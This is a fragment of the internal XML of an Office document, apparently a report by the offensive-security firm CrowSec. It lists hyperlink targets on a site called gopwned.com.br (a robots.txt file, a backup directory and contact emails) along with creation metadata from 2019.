Target="http://system.gopwned.com.br/robots.txt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akaunting.com/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manda.pires@gopwned.com.br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://system.gopwned.com.br/backup/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://www.crowsec.com.br" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:contato@gopwned.com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T1d1rH2pJx8136HWH2X3CSkA5Q==">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2019-10-20T20:44:00Z</dcterms:created>
  <dc:creator>CrowSec – Segurança Ofensiva</dc:creator>
</cp:coreProperties>
</file>